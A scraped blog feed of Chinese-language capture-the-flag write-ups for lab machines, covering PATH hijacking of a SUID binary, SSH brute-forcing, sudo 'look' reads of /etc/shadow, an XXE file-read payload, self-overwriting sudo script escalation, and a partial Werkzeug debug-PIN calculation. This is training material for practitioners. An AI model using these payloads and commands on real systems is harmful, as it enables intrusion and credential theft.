/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

/usr/sbin/pwm

(remote) www-data@lookup:/home/think$ strings /usr/sbin/pwm
/lib64/ld-linux-x86-64.so.2
libc.so.6
fopen
perror
puts
__stack_chk_fail
putchar
popen
fgetc
__isoc99_fscanf
fclose
pclose
__cxa_finalize
__libc_start_main
snprintf
GLIBC_2.4
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
[!] Running 'id' command to extract the username and user ID (UID)
[-] Error executing id command
uid=%*u(%[^)])
[-] Error reading username from id command
[!] ID: %s
/home/%s/.passwords
[-] File /home/%s/.passwords not found
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
pwm.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@@GLIBC_2.7
puts@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
pclose@@GLIBC_2.2.5
snprintf@@GLIBC_2.2.5
fgetc@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
perror@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

它尝试运行id命令来获取用户名和UID
它寻找文件/home/%s/.passwords（%s是用户名）
如果文件不存在，会显示错误信息"[-] File /home/%s/.passwords not found"

这个程序可能是一个自定义的程序，用于管理密码。由于它是SUID root，我们可以尝试利用它。

(remote) www-data@lookup:/home/think$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

1. popen("id", "r")
2. 从 id 输出中解析：
   uid=XXXX(username)
3. 得到 username
4. 拼路径：
   /home/<username>/.passwords
5. fopen 这个文件
6. 逐字符读取并打印

程序使用popen()来执行id命令。这意味着我们可以尝试通过环境变量PATH来劫持id命令，从而控制其输出。
我们可以创建一个恶意的id脚本，让它输出我们想要的用户名，比如root，这样程序就会去读取/root/.passwords文件。

echo 'echo "uid=0((remote) www-data@lookup:/tmp$ echo 'echo "uid=0(root) gid=0(root) groups=0(root)"' >> id
(remote) www-data@lookup:/tmp$ chmod +x id
(remote) www-data@lookup:/tmp$ export PATH=/tmp:$PATH
(remote) www-data@lookup:/tmp$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: root
[-] File /home/root/.passwords not found
(remote) www-data@lookup:/tmp$ /tmp/rootbash -p
www-data@lookup:/tmp$

echo "uid=1000(think) gid=1000(think) groups=1000(think)"

它的作用是：
把这串字符串

原样写到 stdout

让 pwm 通过 fscanf() 成功解析

fake `id` 本质上是一个“程序”

你现在创建的是：

/tmp/id

当 pwm 执行：

popen("id", "r")

系统做的是：

/tmp/id

👉 那它期望什么？

答案：

期望这个程序在 stdout 上打印一行类似 **id** 的输出

如果不写 `echo` 会发生什么？

假设你这样写：

cat > id << 'EOF'
uid=1000(think) gid=1000(think)
EOF

那 /tmp/id 实际内容是：

uid=1000(think) gid=1000(think)

执行时会发生什么？

shell 尝试把 uid=1000(think) 当命令
❌ 命令不存在
❌ 没有任何 stdout 输出

cd /tmp
cat > id << 'EOF'
echo "uid=1000(think) gid=1000(think) groups=1000(think)"
EOF

chmod +x id
export PATH=/tmp:$PATH
www-data@lookup:/tmp$ /usr/sbin/pwm

[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171

ssh爆破

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# hydra -l think -P passwd ssh://192.168.0.103              
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-16 23:26:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per task
[DATA] attacking ssh://192.168.0.103:22/
[22][ssh] host: 192.168.0.103   login: think   password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-16 23:26:34

得到凭据think/josemario.AKA(think)

think@lookup:~$ cat user.txt 
38375fb4dd8baa2b2039ac03d92b820e

提权-root

think@lookup:~$ sudo -l
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

think@lookup:~$ strings /usr/bin/look
/lib64/ld-linux-x86-64.so.2
libbsd.so.0
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
errc
libc.so.6
exit
setlocale
mbrtowc
towlower
optind
__stack_chk_fail
putchar
iswalnum
mmap
strlen
wcschr
malloc
optarg
stderr
getopt_long
fwrite
close
open
__cxa_finalize
errx
strerror
__libc_start_main
__fxstat
LIBBSD_0.0
GLIBC_2.4
GLIBC_2.2.5
AWAVAUATI
|$(1
L$(I
t$,H
tyH9
u+UH
AWAVAUATUSH
tTA9
tPI9
([]A\A]A^A_
[]A\A]A^A_
usage: look [-bdf] [-t char] string [file ...]
invalid termination character
+abdft:
%s: %s
stdout
alternative
binary
alphanum
ignore-case
terminate
:*3$"
/usr/share/dict/words
2d6cbfbc09e5ed78ae212ab4e9ef693c5ed04f.debug
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.gnu_debuglink

sudo 允许你以 root 身份运行 /usr/bin/look
而 look 可以读取任意文件内容
👉 直接 sudo look 读 **/etc/shadow** / root flag / root shell

sudo look '' file

** 👉 等价于：打印文件中的所有行（≈ cat）
👉 前提：look 的实现允许空字符串作为匹配前缀**

`look` 的本质逻辑是：

**打印 **以 STRING 开头的行

在字符串匹配理论里：

任意字符串 都是 以 ""（空字符串）开头的

读取/etc/shadow

think@lookup:~$ sudo /usr/bin/look root /etc/shadow
root:$6$KP40TGoPGcMkX5td$L2jPqII/YjqUc5Ibisj4PFWNs8qtTaG6vNWOQ7v6ShPq5y/qeAmBoWgJrQnvcXUSYzYkqLdwqIcGZRBvhWc7y.:19977:0:99999:7:::

读取/root/root.txt

sudo /usr/bin/look root /root/root.txt

没有读到，看来不是以root开头

写个脚本

think@lookup:/tmp$ nano find_flag.sh

#!/bin/bash

FILE="/root/root.txt"

for c in {A..Z} {a..z} {0..9} \{ \} _ -; do
    echo "[*] Trying '$c'"
    sudo /usr/bin/look "$c" "$FILE" && break
done

think@lookup:/tmp$ chmod +x find_flag.sh

think@lookup:/tmp$ ./find_flag.sh
[*] Trying 'A'
[*] Trying 'B'
[*] Trying 'C'
[*] Trying 'D'
[*] Trying 'E'
[*] Trying 'F'
[*] Trying 'G'
[*] Trying 'H'
[*] Trying 'I'
[*] Trying 'J'
[*] Trying 'K'
[*] Trying 'L'
[*] Trying 'M'
[*] Trying 'N'
[*] Trying 'O'
[*] Trying 'P'
[*] Trying 'Q'
[*] Trying 'R'
[*] Trying 'S'
[*] Trying 'T'
[*] Trying 'U'
[*] Trying 'V'
[*] Trying 'W'
[*] Trying 'X'
[*] Trying 'Y'
[*] Trying 'Z'
[*] Trying 'a'
[*] Trying 'b'
[*] Trying 'c'
[*] Trying 'd'
[*] Trying 'e'
[*] Trying 'f'
[*] Trying 'g'
[*] Trying 'h'
[*] Trying 'i'
[*] Trying 'j'
[*] Trying 'k'
[*] Trying 'l'
[*] Trying 'm'
[*] Trying 'n'
[*] Trying 'o'
[*] Trying 'p'
[*] Trying 'q'
[*] Trying 'r'
[*] Trying 's'
[*] Trying 't'
[*] Trying 'u'
[*] Trying 'v'
[*] Trying 'w'
[*] Trying 'x'
[*] Trying 'y'
[*] Trying 'z'
[*] Trying '0'
[*] Trying '1'
[*] Trying '2'
[*] Trying '3'
[*] Trying '4'
[*] Trying '5'
5a285a9f257e45c68bb6c9f9f57d18e8

think@lookup:~$ sudo look '' "/root/root.txt"
[sudo] password for think: 
5a285a9f257e45c68bb6c9f9f57d18e8

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/lookup/

MazeSec-112

呼啸山庄 — Sat, 17 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"

192.168.0.105   08:00:27:2a:e3:6f       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 23:23 EST
Nmap scan report for 192.168.0.105
Host is up (0.00025s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-title: XML Parser
|_http-server-header: Apache/2.4.62 (Debian)
Service Info: Host: 0.0.0.112; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds

80端口

目录扫描

gobuster dir -u 192.168.0.105 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64

XXE漏洞

192.168.0.105/index.php

发现让输入xml代码，尝试利用xxe漏洞payload

读取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<root>
    <element1>&file;</element1>
    <element2>Value2</element2>
</root>

成功读取passwd

SimpleXMLElement Object
(
    [element1] => root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tuf:x:1000:1000:KQNPHFqG**JHcYJossIe:/home/tuf:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:107:114::/var/lib/snmp:/bin/false
zabbix:x:108:115::/nonexistent:/usr/sbin/nologin

    [element2] => Value2
)

发现存在特殊用户tuf-账号属性本身就很不正常

tuf:x:1000:1000:KQNPHFqG**JHcYJossIe:/home/tuf:/bin/bash

`/etc/passwd` 的标准结构（7 个字段）

每一行必须是下面这个格式，用冒号 : 分隔：

用户名 : 密码占位符 : UID : GID : GECOS : Home目录 : Login Shell

字段	正常情况	tuf 的情况	是否异常
用户名	字母数字	tuf	✅ 正常
密码占位	x	x	✅ 正常
UID	1000+	1000	✅ 正常
GID	对应组	1000	✅ 正常
GECOS	人名/描述	KQNPHFqGJHcYJossIe**	❌ 异常
Home	`/home/xxx`	`/home/tuf`	✅ 正常
Shell	`/bin/bash`	`/bin/bash`	✅ 正常

`/etc/passwd` 的 GECOS 有 3 个常见来源：

adduser 时输入的姓名
管理员随便填的注释
留空

👉 几乎不会有人输入一串这种字符串，除非：

当作提示
当作 密码线索
当作 flag 片段
当作 编码内容

读取flag

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY file SYSTEM "file:///home/tuf/user.txt"> ]> <root>     <element1>&file;</element1>     <element2>Value2</element2> </root>

SimpleXMLElement Object
(
    [element1] => flag{user-b1e12c74f19aac8e57f6fca1ff472905}

    [element2] => Value2
)

读取源代码

<!DOCTYPE html>
<html>
<head>
    <title>XML Parser</title>
</head>
<body>
<?php
if(isset($_POST['xml'])) {
    $xml = $_POST['xml'];
    $data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    if($data) echo "<pre>" . htmlspecialchars(print_r($data, true)) . "</pre>";
    else echo "<pre>Parse Error</pre>";
}
?>
    <form method="POST">
        <textarea name="xml" required></textarea><br>
        <input type="submit" value="Parse XML">
    </form>
</body>
</html>

漏洞成因

$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

LIBXML_NOENT 的作用是：

启用 XML 实体替换（Expand Entities）

也就是说：

XML 中定义的 <!ENTITY ...>
会被自动解析并替换为真实内容

提权

根据passwd中tufx中KQNPHFqG**JHcYJossIe，怀疑是密码，尝试补全登录

tuf:x:1000:1000:KQNPHFqG**JHcYJossIe:/home/tuf:/bin/bash

写个python脚本自动生成所有**可能(*尝试字母和数字)

import itertools
import string

template = "KQNPHFqG**JHcYJossIe"
charset = string.ascii_letters + string.digits  # a-zA-Z0-9

with open("full_password_list.txt", "w") as f:
    for a, b in itertools.product(charset, repeat=2):
        f.write(template.replace("**", a + b) + "\n")

print("Done, total:", len(charset) ** 2)

ssh爆破

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# medusa -h 192.168.0.105 -u tuf -P full_password_list.txt -M ssh -t 64 -n 22 -O medusa_result.txt -f

SUCCESS:KQNPHFqG6mJHcYJossIe

成功获取凭据tuf/KQNPHFqG6mJHcYJossIe

sudo -l

tuf@112:~$ sudo -l
Matching Defaults entries for tuf on 112:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tuf may run the following commands
        on 112:
    (ALL) NOPASSWD: /opt/112.sh
tuf@112:~$ 
tuf@112:~$ cat /opt/112.sh 
#!/bin/bash
input_url=""
output_file=""
use_file=false
regex='^https://maze-sec.com/[a-zA-Z0-9/]*$'
while getopts ":u:o:" opt; do
    case ${opt} in
        u) input_url="$OPTARG" ;;
        o) output_file="$OPTARG"; use_file=true ;;
        \?) echo "错误: 无效选项 -$OPTARG"; exit 1 ;;
        :) echo "错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;;
    esac
done
if [[ -z "$input_url" ]]; then
    echo "错误: 必须使用 -u 参数提供URL"
    exit 1
fi
if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then
    echo "错误: URL必须以 https://maze-sec.com/ 开头"
    exit 1
fi
if [[ ! "$input_url" =~ $regex ]]; then
    echo "错误: URL包含非法字符，只允许字母、数字和斜杠"
    exit 1
fi
if (( RANDOM % 2 )); then
    result="$input_url is a good url."
else
    result="$input_url is not a good url."
fi
if [ "$use_file" = true ]; then
    echo "$result" > "$output_file"
    echo "结果已保存到: $output_file"
else
    echo "$result"
fi

可以写入任意文件但内容固定

这一步开始卡住了，思路跑偏了，以为是通过root让系统配置文件进行覆盖，没想过覆盖自身

❌ sudoers

覆盖 /etc/sudoers
结果：sudo 严格拒绝（Debian 正确行为）

❌ profile / bash 执行

/etc/profile 写入
bash 将 https://maze-sec.com/a 视为绝对路径命令
PATH / alias / function 全部不可劫持

❌ PAM 破坏

/etc/pam.d/su
/etc/pam.d/common-auth
结果：su 默认拒绝（fail-closed）

❌ /etc/passwd

root 用户消失
su 明确提示 user root does not exist
没有 UID fallback

❌ ld.so.preload

setuid 程序继续执行
权限未提升
glibc 对 preload 失败是 ignore + secure-exec

尝试覆盖自身

tuf@112:~$ sudo /opt/112.sh -u "https://maze-sec.com/test" -o /opt/112.sh
结果已保存到: /opt/112.sh
tuf@112:~$ sudo /opt/112.sh
/opt/112.sh: 1: /opt/112.sh: https://maze-sec.com/test: not found

可以发现sudo执行后显示https://maze-sec.com/test: not found

命令名: https://maze-sec.com/test
参数: is a good url.

因为 **/opt/112.sh** 在执行 **https://maze-sec.com/test** 时，Shell 会在「当前工作目录」找这个路径，而当前目录就是 **~**（**/home/tuf**）。

所以往 ~ 里写。

那么重置下环境

Linux 的解析方式：

: → 普通字符
/ → 目录分隔符
// → 连续的 /，等价于一个 /

所以系统看到的是：

https: / maze-sec.com / test

也就是目录结构：

https:/
└── maze-sec.com/
    └── test

构造/home/tuf/https:/maze-sec.com/test

tuf@112:~$ mkdir -p ~/https:/maze-sec.com/
tuf@112:~$ echo '#!/bin/bash' > ~/https:/maze-sec.com/test
tuf@112:~$ echo '/bin/bash' >> ~/https:/maze-sec.com/test
tuf@112:~$ chmod +x ~/https:/maze-sec.com/test
tuf@112:~$ sudo /opt/112.sh -u "https://maze-sec.com/test" -o /opt/112.sh
结果已保存到: /opt/112.sh
tuf@112:~$ sudo /opt/112.sh
root@112:/home/tuf#

root@112:/home/tuf# cat /root/root.txt
flag{root-538dc127225a0c97b060b1ff9570390a}
root@112:/home/tuf#

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/qq-group/112/

HMV-Leet

呼啸山庄 — Thu, 15 Jan 2026 00:00:00 GMT

信息收集

ip定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.197   08:00:27:cf:b1:b4       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.197
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 07:00 EST
Nmap scan report for 192.168.0.197
Host is up (0.00081s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e1:5d:7c:b7:07:92:17:dc:46:76:7d:be:a9:50:43:d2 (ECDSA)
|_  256 a0:f3:b3:86:93:f5:58:82:88:dd:e5:10:db:35:de:62 (ED25519)
7777/tcp open  http    Werkzeug httpd 3.0.1 (Python 3.11.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.0.1 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
    _|. _ _  _  _  _ _|_    v0.4.3.post1               
 (_||| _) (/_(_|| (_| )                              
                                                     
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/_192.168.0.197_7777/_26-01-14_07-02-22.txt

Target: http://192.168.0.197:7777/

[07:02:22] Starting:                                 
[07:02:41] 200 -    2KB - /console
[07:02:43] 500 -   14KB - /download

Task Completed 

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.197:7777 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.197:7777
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              js,yaml,php,txt,html,zip,db,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/download             (Status: 500) [Size: 14478]
/console              (Status: 200) [Size: 1563]

7777端口

/index

a→4 e→3 i→1 o→0 s→5 t→7 b→8 g→6 l→1 z→2

查看下载文件的链接

http://192.168.0.197:7777/download?filename=converted_text.txt

尝试

http://192.168.0.197:7777/download?filename=../../../etc/passwd

成功下载出passwd

http://192.168.0.197:7777/download?filename=../../../tmp/

     var CONSOLE_MODE = false,
          EVALEX = true,
          EVALEX_TRUSTED = false,
          SECRET = "XKgNAKb38bX6ogmO8S5t";

http://192.168.0.197:7777/download?filename=../../../../opt/project/app.py

得到源码

from flask import Flask, request, send_file, abort, render_template_string
from werkzeug.exceptions import BadRequest
import os

app = Flask(__name__)
app.config['DEBUG'] = True 

@app.route('/', methods=['GET', 'POST'])
def leet_converter():
    if request.method == 'POST':
        text = request.form['text']
        leet_text = text.translate(str.maketrans("aeios", "43105"))
        output_filename = "/tmp/converted_text.txt"
        with open(output_filename, "w") as f:
            f.write(leet_text)
        return render_template_string('''
            <!DOCTYPE html>
            <html>
            <head>
		<title>L33T Convertor</title>
                <style>
                    body { background-color: #333; color: #ddd; font-family: "Courier New", Courier, monospace; margin: 0; padding: 20px; }
                    .container { max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; }
                    h2 {
		    color: #eee;
    		    text-align: center;
		    }

                    a, a:visited { color: #dcdcdc; text-decoration: underline; }
                    a:hover { color: #ffffff; }
                    form { display: flex; flex-direction: column; }
                    input[type="text"], input[type="submit"] { padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; }
                    input[type="submit"] { cursor: pointer; }
                    input[type="submit"]:hover { background: #666; }
                </style>
            </head>
            <body>
                <div class="container">
                    <h2>L33T converter</h2>
                    <form method="post">
                        <input type="text" name="text" placeholder="Type your text here">
                        <input type="submit" value="Convert to L33T">
                    </form>
                    {% if leet_text %}
                        <p>Résultat : {{ leet_text }}</p>
                        <a href="/download?filename=converted_text.txt">Download file text</a>
                    {% endif %}
                </div>
            </body>
            </html>
        ''', leet_text=leet_text)
    else:
        return render_template_string('''
            <!DOCTYPE html>
            <html>
            <head>
                <style>
                    body { background-color: #333; color: #ddd; font-family: "Courier New", Courier, monospace; margin: 0; padding: 20px; }
                    .container { max-width: 600px; margin: auto; padding: 20px; background-color: #444; border-radius: 8px; }
                    h2 { color: #eee; }
                    form { display: flex; flex-direction: column; }
                    input[type="text"], input[type="submit"] { padding: 10px; margin-top: 10px; border-radius: 4px; border: 1px solid #555; background: #555; color: #ddd; }
                    input[type="submit"] { cursor: pointer; }
                    input[type="submit"]:hover { background: #666; }
                </style>
            </head>
            <body>
                <div class="container">
                    <center><h2>L33T Converter</h2></center>
                    <form method="post">
                        <input type="text" name="text" placeholder="Type your text here">
                        <input type="submit" value="Convert to L33T">
                    </form>
                </div>
            </body>
            </html>
        ''')

@app.route('/download')
def download_file():
    filename = request.args.get('filename')

    if not filename or filename.startswith("/"):
        raise ValueError("Parameter 'filename' invalid or missing.")

    filepath = os.path.join("/tmp", filename)

    try:
        return send_file(filepath, as_attachment=True)
    except Exception as e:
        raise e

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

写个脚本计算pin码

计算pin码

为什么需要计算 PIN 码？

Werkzeug 是 Flask 的底层 WSGI 工具库。当 Flask 应用在调试模式（debug=True）下崩溃时，会显示一个交互式调试器页面。这个调试器有一个 Python 控制台，可以用来执行任意 Python 代码（RCE）。

为了安全，Werkzeug 要求输入 PIN 码 才能解锁这个控制台。但这个 PIN 码是基于系统特定信息生成的，如果攻击者能获取这些信息，就可以计算出 PIN 码。

PIN 码计算需要的信息：

根据 Werkzeug 的源码，计算 PIN 码需要以下 6 个信息：

1. 用户名 - 运行 Flask 进程的用户

获取方式：读取 /proc/self/status 或 /proc/<pid>/status
查找 Uid: 或 Name: 字段

2. modname - 模块名（通常是 `'flask.app'`）

3. 应用名 - （通常是 `'Flask'`）

4. 文件路径 - Flask 库的绝对路径

我们已经知道：/opt/project/venv/lib/python3.11/site-packages/flask/app.py

5. 机器 ID - 系统的唯一标识

我们已经获取：f6791f240ce6407ea271e86b78ac3bdb
来自 /etc/machine-id

6. cgroup 信息 - 容器的 cgroup 信息（如果是容器环境）

获取方式：读取 /proc/self/cgroup

这个靶机有个bug点就是/proc/self/cgroup不容易取出来

靠玄学才会取出来，看wp用火狐可以用别的取不出来，我怎么都取不出来

获取pin码生成脚本

curl "http://192.168.0.197:7777/download?filename=../../../../opt/project/venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py"

尝试计算pin，可以参考https://github.com/wdahlenburg/werkzeug-debug-console-bypass

/etc/machine-id
# f6791f240ce6407ea271e86b78ac3bdb
/proc/sys/kernel/random/boot_id
# da68b9a7-336e-40df-879a-f38a6447bfe9
/proc/self/cgroup
# 0::/system.slice/flaskapp.service

MAC地址: 08:00:27:cf:b1:b4
MAC十进制: 8796760945076
用户名: www-data

#!/bin/python3
import hashlib
from itertools import chain

probably_public_bits = [
        'www-data',# username
        'flask.app',# modname
        'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/opt/project/venv/lib/python3.11/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
        '8796757588703',# str(uuid.getnode()),  /sys/class/net/ens33/address 
        # Machine Id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup
        'f6791f240ce6407ea271e86b78ac3bdbflaskapp.service'
]

h = hashlib.sha1() # Newer versions of Werkzeug use SHA1 instead of MD5
